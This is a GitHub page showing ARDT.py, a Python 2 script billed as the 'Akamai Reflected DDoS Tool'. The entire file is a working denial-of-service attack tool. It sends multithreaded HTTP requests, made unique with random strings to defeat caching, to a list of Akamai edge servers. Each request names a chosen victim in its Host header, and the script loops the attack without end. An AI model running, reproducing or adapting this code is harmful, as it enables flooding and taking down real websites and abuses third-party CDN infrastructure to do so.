forked from m57/ARDT
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathARDT.py
180 lines (137 loc) · 4.82 KB
/
ARDT.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/env python
#
######################################
import threading
import re
import sys
import time
import socket
import string
import random
import hashlib
import Queue
c_g = "\033[1;32m"
c_r = "\033[1;31m"
c_y = "\033[1;33m"
c_e = "\033[0m"
target = ""
akamai_ips = []
base_request = ""
threads = []
num_threads = 40
VERSION = "v1.0"
def banner():
print c_g
print "IOKWiOKWiOKWiOKWiOKWiOKVlyDilojilojilojilojilojilojilZcg4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlwrilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilojilojilZTilZDilZDilojilojilZfilZrilZDilZDilojilojilZTilZDilZDilZ0K4paI4paI4paI4paI4paI4paI4paI4pWR4paI4paI4paI4paI4paI4paI4pWU4pWd4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWU4pWQ4pWQ4paI4paI4pWR4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWRICDilojilojilZEgICDilojilojilZEgICAK4paI4paI4pWRICDilojilojilZHilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKWiOKWiOKWiOKWiOKVlOKVnSAgIOKWiOKWiOKVkSAgIArilZrilZDilZ0gIOKVmuKVkOKVneKVmuKVkOKVnSAg4pWa4pWQ4pWd4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWdICAgIOKVmuKVkOKVnSAgICVzCg==".decode("base64") % VERSION
print c_e
print " Akamai Reflected DDoS Tool\n"
print "\tby @program_ninja"
print " https://github.com/m57/ARDT.git"
print "_" * 37 + "\n"
def usage():
banner()
print "Usage: %s -l [akamai_list] -t [victim_host] -r [request_file] -n [threads (default: 40)] " % sys.argv[0]
print ""
exit()
def gen_rand_string():
charset = string.ascii_letters
rand_string = ""
for i in range(1, 15):
rand_string += str(random.randint(1,999999))
rand_string += charset[random.randint(0,len(charset)-1)]
return hashlib.md5(rand_string).hexdigest()
class WorkerThread(threading.Thread):
def __init__(self, qin, tid):
threading.Thread.__init__(self)
self.qin = qin
self.tid = tid
self.kill_received = False
def stop(self):
self.kill_recieved = True
def run(self):
while not self.kill_received:
while True:
try:
akami_ip = self.qin.get(timeout=1)
except Queue.Empty:
print c_y + "[?] " + c_e + "Queue empty, please wait..."
try:
r = base_request.replace("%RANDOM%", gen_rand_string())
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect( (akami_ip, 80) )
s.send(r)
ret = s.recv(16).strip()
print c_g + "[Thread '%d' ] Packet => '%s:80' => Response '%s'" % (self.tid, akami_ip, ret) + c_e
s.close()
self.qin.task_done()
except:
print c_r + "[!] " + c_e + "Error contacting '%s:80'" % akami_ip
s.close()
if __name__ == "__main__":
if "-t" not in sys.argv:
t_check = False
else:
t_check = True
if "-l" not in sys.argv or "-r" not in sys.argv:
usage()
if "-n" in sys.argv:
num_threads = int(sys.argv[sys.argv.index("-n")+1])
banner()
akamai_list = sys.argv[sys.argv.index("-l")+1]
request_f = sys.argv[sys.argv.index("-r")+1]
try:
request_file = open(request_f, "r")
base_request = request_file.read()
if "Host: " not in base_request and not t_check:
print c_r + "[!] " + c_e + "'Host: ' field not found in HTTP(s) request file '%s', either set this manually or use '-t www.target.com' in the command line options" % request_f
exit()
elif "Host: " in base_request and not t_check:
reg = "(Host: .*)"
target = re.findall(reg, base_request)[0].split(":")[1].strip()
except:
print c_r + "[!] " + c_e,
print "Error opening request file: '%s'." % request_f
exit()
try:
if t_check:
target = sys.argv[sys.argv.index("-t")+1]
base_request = base_request.strip() + "\r\nHost: %s\r\n\r\n" % target
except:
pass
try:
akami_file = open(akamai_list, "r")
for i in akami_file.readlines():
akamai_ips.append(i.strip())
except:
print c_r + "[!] " + c_e,
print "Error opening Akamai list file: '%s'." % akamai_list
exit()
start_time = time.time()
print c_y + "[?] " + c_e + " Target: '%s'" % target
print c_y + "[?] " + c_e + " Request file: '%s'" % request_f
print c_y + "[?] " + c_e + " Akamai EdgeHosts file ('%s' IP's): '%s'" % ( len(akamai_ips), akamai_list)
print c_y + "[?] " + c_e + " Threads '%d'\n" % num_threads
x = raw_input(c_r + "[!] " + c_e + " This is about to perform a reflected DDoS attack with the above settings.\nAre you sure ? [Y/N] ")
if not (x[:1] == "y") or (x[:1] == "Y"):
print c_r + "[!] " + c_e + " Exiting..."
exit()
while True:
qin = Queue.Queue()
try:
for i in range(0, num_threads):
worker = WorkerThread(qin, i)
worker.setDaemon(True)
worker.daemon = True
worker.start()
threads.append(worker)
for ip in akamai_ips:
qin.put(ip)
qin.join()
print c_g + "[*] " + c_e + "All Akamai hosts done, re-looping!"
time.sleep(1)
except KeyboardInterrupt:
print c_r + "[!] " + c_e + "Ctrl+C Caught! Exiting threads..."
for t in threads:
t.stop()
sys.exit(0)